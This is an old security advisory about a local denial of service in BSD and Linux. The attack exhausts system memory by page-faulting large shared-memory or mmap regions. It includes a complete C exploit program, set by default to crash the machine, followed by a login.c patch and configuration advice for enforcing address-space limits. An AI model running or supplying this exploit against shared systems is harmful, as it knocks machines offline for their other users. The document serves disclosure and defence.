COMMAND

    Shared memory (IPC)

SYSTEMS AFFECTED

    Most BSD kernels

PROBLEM

    Mike  Perry  posted  following.   While  fiddling with various IPC
    mechanisms and reading The Design and Implementation of 4.4BSD,  a
    few things can struch reader as potentially dangerous.   According
    to the book, when you request a shared memory segment via  mmap(),
    the file isn't  actually physically in  memory until you  start to
    trigger page faults and cause the vnode-pager to page in the  data
    from the file.  Then,  the following passage from shmctl(2)  under
    Linux caught  my eye:   "The user  must ensure  that a  segment is
    eventually destroyed;  otherwise its  pages that  were faulted  in
    will remain in memory or swap."

    So as it  turns out that  it is in  fact possible to  create a DoS
    condition by requesting a truckload of shared mem, then triggering
    pagefaults in the entire shared region.  Now the end result is  no
    different  than  a  simple  fork   or  malloc  bomb,  but  it   is
    considerably harder to  prevent on most  systems.  This  is mainly
    because:

        1. The  system  does  not  check  rlimits for mmap and  shmget
           (FreeBSD)
        2. The system  never bothers to  offer the ability  to set the
           rlimits for  virtual memory  via shells,  login process, or
           otherwise.  (Linux)
        3. b. The  system  does  not actually allocate shared   memory
              until a page fault is triggered (this could be argued to
              be a feature - Linux, *BSD)
           a. The system does not  watch to make sure you  don't share
              more memory than exists. (Linux, Irix, BSD?)
        4. With System  V IPC, shared  memory persists even  after the
           process is gone.   So even though  the kernel may  kill the
           process  after  it  exhausts  all  memory from page faults,
           there still  is 0  memory left  for the  system.   (suppose
           with some trickery  you might be  able to achieve  the same
           results  by  shared  mmap()'ing  a  few large files between
           pairs of processes)  (All)

    Mike attached a program  that will exploit these  conditions using
    either shmget(), mmap(), or by getting malloc to mmap() (those are
    in order  of effectivness).   This program  should compile  on any
    architecture.  SGI  Irix is not  vulnerable.    Reading The Design
    and Implementation of 4.4BSD, it sounds as if the BSDs should  all
    be vulnerable.  FreeBSD will mmap  as much memory as you tell  it.
    The  default  attack  is  __FUXX0R_MMAP__.   Mike posted the wrong
    file.   He  meant  to  post  one  that  had  the default attack of
    __FUXX0R_SYSV__,  and  with  __REALLY_FUXX0R__  undefined  (so the
    prog wouldn't  actually page  fault and  kill your  system, if you
    just wanted to see if  limits would kick in). Please  change these
    before running the exploit. System V IPC is where the real  kernel
    crusher is.

    It seems  that OpenBSD  2.5-current (Jul  3) is  vulnerable.   The
    place  to  check  if  you're  vulnerable  is sys/resource.h, or if
    you're BSD and have  kernel source, checking sys/vm/vm_mmap.c  for
    RLIMIT other than STACK  should let you know.   The proper way  to
    fix this is to have a seperate limit for address space or  virtual
    memory.  Solaris has both  (probably since their malloc uses  both
    brk and mmap, and the virtual memory limit is for stopping  malloc
    bombs).

    /*
     * This program can be used to exploit DoS bugs in the VM systems or utility
     * sets of certain OS's.
     *
     * Common problems:
     * 1. The system does not check rlimits for mmap and shmget (FreeBSD)
     * 2. The system never bothers to offer the ability to set the rlimits for
     *    virtual memory via shells, login process, or otherwise. (Linux)
     * 3. b. The system does not actually allocate shared memory until a page fault
     *       is triggered (this could be argued to be a feature - Linux, *BSD)
     *    a. The system does not watch to make sure you don't share more memory
     *       than exists. (Linux, Irix, BSD?)
     * 4. With System V IPC, shared memory persists even after the process is
     *    gone. So even though the kernel may kill the process after it exhausts all
     *    memory from page faults, there still is 0 memory left for the system.
     *    (All)
     *
     * This program should compile on any architecture. SGI Irix is not
     * vulnerable. From reading The Design and Implementation of 4.4BSD it sounds
     * as if the BSDs should all be vulnerable. FreeBSD will mmap as much memory
     * as you tell it. I haven't tried page faulting the memory, as the system is
     * not mine. I'd be very interested to hear about OpenBSD...
     *
     * This program is provided for vulnerability evaluation ONLY. DoS's aren't
     * cool, funny, or anything else. Don't use this on a machine that isn't
     * yours!!!
     */
    #include <stdio.h>
    #include <errno.h>
    #include <sys/ipc.h>
    #include <sys/shm.h> /* redefinition of LBA.. PAGE_SIZE in both cases.. */
    #ifdef __linux__
    #include <asm/shmparam.h>
    #include <asm/page.h>
    #endif
    #include <sys/types.h>
    #include <stdio.h>
    #include <sys/stat.h>
    #include <sys/fcntl.h>
    #include <sys/mman.h>

    int len;

    #define __FUXX0R_MMAP__

    /* mmap also implements the copy-on-fault mechanism, but because the only way
     * to easily exploit this is to use anonymous mappings, once the kernel kills
     * the offending process, you can recover. (Although swap death may still
     * occurr */
    /* #define __FUXX0R_MMAP__ */

    /* Most mallocs use mmap to allocate large regions of memory. */
    /* #define __FUXX0R_MMAP_MALLOC__ */


    /* Guess what this option does :) */
    #define __REALLY_FUXX0R__

    /* From glibc 2.1.1 malloc/malloc.c */
    #define DEFAULT_MMAP_THRESHOLD (128 * 1024)

    #ifndef PAGE_SIZE
    # define PAGE_SIZE 4096
    #endif

    #ifndef SHMSEG
    # define SHMSEG 256
    #endif

    #if defined(__FUXX0R_MMAP_MALLOC__)
    void *mymalloc(int n)
    {
        if(n <= DEFAULT_MMAP_THRESHOLD)
	    n = DEFAULT_MMAP_THRESHOLD + 1;
        return malloc(n);
    }

    void myfree(void *buf)
    {
        free(buf);
    }
    #elif defined(__FUXX0R_MMAP__)
    void *mymalloc(int n)
    {
        int fd;
        void *ret;
        fd = open("/dev/zero", O_RDWR);
        ret = mmap(0, n, PROT_READ|PROT_WRITE, MAP_PRIVATE, fd, 0);
        close(fd);
        return (ret == (void *)-1 ? NULL : ret);
    }
    void myfree(void *buf)
    {
        munmap(buf, len);
    }

    #elif defined(__FUXX0R_SYSV__)
    void *mymalloc(int n)
    {
        char *buf;
        static int i = 0;
        int shmid;
        i++; /* 0 is IPC_PRIVATE */
        if((shmid = shmget(i, n, IPC_CREAT | SHM_R | SHM_W)) == -1)
        {
    #if defined(__irix__)
    	    if (shmctl (shmid, IPC_RMID, NULL))
	    {
	        perror("shmctl");
	    }
    #endif

	    return NULL;
        }
        if((buf = shmat(shmid, 0, 0)) == (char *)-1)
        {
    #if defined(__irix__)
    	    if (shmctl (shmid, IPC_RMID, NULL))
	    {
	        perror("shmctl");
	    }
    #endif
	    return NULL;
        }

    #ifndef __REALLY_FUXX0R__
        if (shmctl (shmid, IPC_RMID, NULL))
        {
	    perror("shmctl");
        }
    #endif

        return buf;
    }

    void myfree(void *buf)
    {
        shmdt(buf);
    }
    #endif

    #ifdef __linux__
    void cleanSysV()
    {
        struct shmid_ds shmid;
        struct shm_info shm_info;
        int id;
        int maxid;
        int ret;
        int shid;
        maxid = shmctl (0, SHM_INFO, (struct shmid_ds *) &shm_info);
        printf("maxid %d\n", maxid);
        for (id = 0; id <= maxid; id++)
        {
	    if((shid = shmctl (id, SHM_STAT, &shmid)) < 0)
	        continue;

	    if (shmctl (shid, IPC_RMID, NULL))
	    {
	        perror("shmctl");
	    }
	    printf("id %d has %d attachments\n", shid, shmid.shm_nattch);
	    shmid.shm_nattch = 0;
	    shmctl(shid, IPC_SET, &shmid);
	    if(shmctl(shid, SHM_STAT, &shmid) < 0)
	    {
	        printf("id %d deleted sucessfully\n", shid);
	    }
	    else if(shmid.shm_nattch == 0)
	    {
	        printf("Still able to stat id %d, but has no attachments\n", shid);
	    }
	    else
	    {
	        printf("Error, failed to remove id %d!\n", shid);
	    }

        }
    }
    #endif

    int main(int argc, char **argv)
    {
        int shmid;
        int i = 0;
        char *buf[SHMSEG * 2];
        int max;
        int offset;
        if(argc < 2)
        {
	    printf("Usage: %s <[0x]size of segments>\n", argv[0]);
    #ifdef __linux__
	    printf("    or %s --clean (destroys all of IPC space you have permissions to)\n", argv[0]);
    #endif
	    exit(0);
        }

    #ifdef __linux__
        if(!strcmp(argv[1], "--clean"))
        {
	    cleanSysV();
	    exit(0);
        }
    #endif

        len = strtol(argv[1], NULL, 0);
        for(buf[i] = mymalloc(len); i < SHMSEG * 2 && buf[i] != NULL; buf[++i] = mymalloc(len))
	    ;

        max = i;
        perror("Stopped because");
        printf("Maxed out at %d %d byte segments\n", max, len);
    #if defined(__FUXX0R_SYSV__) && defined(SHMMNI)
        printf("Despite an alleged max of %d (%d per proc) %d byte segs. (Page "
	        "size: %d), \n", SHMMNI, SHMSEG, SHMMAX,  PAGE_SIZE);
    #endif

    #ifdef __REALLY_FUXX0R__
        fprintf(stderr, "Page faulting alloced region... Have a nice life!\n");
        for(i = 0; i < max; i++)
        {
	    for(offset = 0; offset < len; offset += PAGE_SIZE)
	    {
	        buf[i][offset] = '*';
	    }
	    printf("wrote to %d byes of memory, final offset %d\n", len, offset);
        }
        // never reached :(
    #else
        for(i = 0; i <= max; i++)
        {
	    myfree(buf[i]);
        }
    #endif
        exit(42);
    }

    For people  who have  using small  segments to  map and caused the
    program to segfault, this is  because the default attack is  mmap,
    and you can  do an infinite  number of private  mmapings.  Use  an
    array of pointers to keep track of the memory to free it when  the
    __REALLY_FUXX0R__  option  isn't  set.   So  you  overrun your own
    buffer.  The buffer size is 2 times the limit for SysV IPC  shares
    for processes, so the buffer will not be overrun with that attack.

SOLUTION

    Below is a patch to util-linux-2.9o login.c (and pathnames.h) that
    provides a means under Linux  (should be pretty portable to  other
    OS's) to set  limits for the  address space limit  (RLIMIT_AS: the
    rlimit that controls how   much  data   you can actually map  into
    your process).   The  patch is  based on  an  old program   called
    lshell   that   set   limits  by  wrapping  your  shell.    Sample
    /etc/limits file:

        # Limit the user guest to 5 minutes CPU time and 8 procs, 5Mb address space guest C5P8V5D2
        # 60 min's CPU time, 30 procs, 15Mb data, 50 megs total address space, 5 megs
        # stack, 15 megs of RSS.
        default C60P30D15V50S5R15

    At the very  least, it is  recommended default V<size  of physical
    memory>.  You can use lowercase letters for the next lowest  order
    of magnitude of units.   The comment in the  patch explains it  in
    further detail.   Note even  in this  case, a  determined user can
    probably just login a dozen or so times and use SysV IPC to  steal
    the system memory.

    diff -ur ./util-linux-2.9o/lib/pathnames.h ./util-linux-2.9o-mp/lib/pathnames.h
    --- ./util-linux-2.9o/lib/pathnames.h	Sun Oct 11 14:19:16 1998
    +++ ./util-linux-2.9o-mp/lib/pathnames.h	Wed Jul 14 22:51:13 1999
    @@ -86,6 +86,7 @@

     #define _PATH_SECURE		"/etc/securesingle"
     #define _PATH_USERTTY           "/etc/usertty"
    +#define _PATH_LIMITS		"/etc/limits"

     #define _PATH_MTAB		"/etc/mtab"
     #define _PATH_UMOUNT		"/bin/umount"
    diff -ur ./util-linux-2.9o/login-utils/login.c ./util-linux-2.9o-mp/login-utils/login.c
    --- ./util-linux-2.9o/login-utils/login.c	Sat Mar 20 14:20:16 1999
    +++ ./util-linux-2.9o-mp/login-utils/login.c	Wed Jul 14 22:49:24 1999
    @@ -185,6 +185,7 @@
     char *stypeof P_((char *ttyid));
     void checktty P_((char *user, char *tty, struct passwd *pwd));
     void sleepexit P_((int eval));
    +void setup_limits P_(struct passwd *pwd);
     #ifdef CRYPTOCARD
     int cryptocard P_((void));
     #endif
    @@ -1110,6 +1111,8 @@

         childArgv[childArgc++] = NULL;

    +    setup_limits(pwd);
    +
         execvp(childArgv[0], childArgv + 1);

         if (!strcmp(childArgv[0], "/bin/sh"))
    @@ -1120,6 +1123,161 @@

         exit(0);
     }
    +
    +/* Most of this code ripped from lshell by Joel Katz */
    +void process(char *buf)
    +{
    +    /* buf is of the form [Fn][Pn][Ct][Vm][Sm][Rm][Lm][Dm] where */
    +    /* F specifies n max open files */
    +    /* P specifies n max procs */
    +    /* c specifies t seconds of cpu */
    +    /* C specifies t minutes of cpu */
    +    /* v specifies m kbs of total virtual memory (address space) */
    +    /* V specifies m megs of total virtual memory (address space) */
    +    /* s specifies m kbs of stack */
    +    /* S specifies m megs of stack */
    +    /* r specifies m kbs of RSS */
    +    /* R specifies m megs of RSS */
    +    /* l specifies m kbs of locked (non-swappable) memory */
    +    /* L specifies m megs of locked (non-swappable) memory */
    +    /* d specifies m kbs of Data segment */
    +    /* D specifies m megs of Data segment */
    +
    +    struct rlimit rlim;
    +    char *pp = buf;
    +    int i;
    +
    +    while(*pp!=0)
    +    {
    +	i = 1;
    +	switch(*pp++)
    +	{
    +	    case 'f':
    +	    case 'F':
    +		i = atoi(pp);
    +		if(!i)
    +		    break;
    +		rlim.rlim_cur = i;
    +		rlim.rlim_max = i;
    +		setrlimit(RLIMIT_NOFILE, &rlim);
    +		break;
    +	    case 'p':
    +	    case 'P':
    +		i = atoi(pp);
    +		if(!i)
    +		    break;
    +		rlim.rlim_cur = i;
    +		rlim.rlim_max = i;
    +		setrlimit(RLIMIT_NPROC, &rlim);
    +		break;
    +	    case 'C':
    +		i = 60;
    +	    case 'c':
    +		i *= atoi(pp);
    +		if(!i)
    +		    break;
    +		rlim.rlim_cur = i;
    +		rlim.rlim_max = i;
    +		setrlimit(RLIMIT_CPU, &rlim);
    +		break;
    +	    case 'V':
    +		i = 1024;
    +	    case 'v':
    +		i *= atoi(pp)*1024;
    +		if(!i)
    +		    break;
    +		rlim.rlim_cur = i;
    +		rlim.rlim_max = i;
    +#if defined(RLIMIT_AS) /* Linux */
    +		setrlimit(RLIMIT_AS, &rlim);
    +#else if defined(RLIMIT_VMEM) /* Irix */
    +		setrlimit(RLIMIT_VMEM, &rlim);
    +#endif
    +		break;
    +	    case 'S':
    +		i = 1024;
    +	    case 's':
    +		i *= atoi(pp)*1024;
    +		if(!i)
    +		    break;
    +		rlim.rlim_cur = i;
    +		rlim.rlim_max = i;
    +		setrlimit(RLIMIT_STACK, &rlim);
    +		break;
    +	    case 'R':
    +		i = 1024;
    +	    case 'r':
    +		i *= atoi(pp)*1024;
    +		if(!i)
    +		    break;
    +		rlim.rlim_cur = i;
    +		rlim.rlim_max = i;
    +		setrlimit(RLIMIT_RSS, &rlim);
    +		break;
    +	    case 'L':
    +		i = 1024;
    +	    case 'l':
    +		i *= atoi(pp)*1024;
    +		if(!i)
    +		    break;
    +		rlim.rlim_cur = i;
    +		rlim.rlim_max = i;
    +		setrlimit(RLIMIT_MEMLOCK, &rlim);
    +		break;
    +	    case 'D':
    +		i = 1024;
    +	    case 'd':
    +		i *= atoi(pp)*1024;
    +		if(!i)
    +		    break;
    +		rlim.rlim_cur = i;
    +		rlim.rlim_max = i;
    +		setrlimit(RLIMIT_DATA, &rlim);
    +		break;
    +	}
    +    }
    +}
    +
    +void setup_limits(struct passwd *pw)
    +{
    +    FILE *fp;
    +    int i;
    +    char buf[200], name[20], limits[64];
    +    char *p;
    +
    +    if(pw->pw_uid == 0)
    +    {
    +	return;
    +    }
    +
    +    if((fp = fopen(_PATH_LIMITS,"r")) == NULL)
    +    {
    +	return;
    +    }
    +
    +    while(fgets(buf, 200, fp) != NULL)
    +    {
    +	if(buf[0] == '#')
    +	    continue;
    +
    +	p = strchr(buf, '#');
    +	if(p)
    +	    *p = 0;
    +
    +	i=sscanf(buf, "%s %s", name, limits);
    +
    +	if(!strcmp(name, pw->pw_name))
    +	{
    +	    if(i==2)
    +		process(limits);
    +	    fclose(fp);
    +	    return;
    +	}
    +    }
    +    fclose(fp);
    +    process(limits); /* Last line is default */
    +}
    +

     void
     getloginname()

    SysVinit  (>2.54)  uses  /etc/initscript  (or /sbin/initscript) to
    spawn the processes listed in /etc/inittab, so you can set  limits
    within  that  (e.g.  for   the  getty  processes).   Either   wrap
    in.telnetd or use -L  to wrap  the login  program.  Set limits  in
    the  rc.init2  (etc)   script  for  daemons   which  may   execute
    user-defined  code  (e.g.  crond,  httpd).   Similarly for xdm via
    Xstartup.  You might also want to wrap your MDAs if you are  using
    procmail or allow program aliases in ~/.forward files.


    You have to use pam, or Sys V init, or patch.  Lshell does not set
    the RLIMIT_AS limit either, you have to apply patch to it.   After
    more research, it  seems that System  V implements RLIMIT_VMEM  to
    stop people from exploiting this problem, but apparently when  BSD
    implemented the Sys  V IPC, they  neglected to add  an appropriate
    RLIMIT.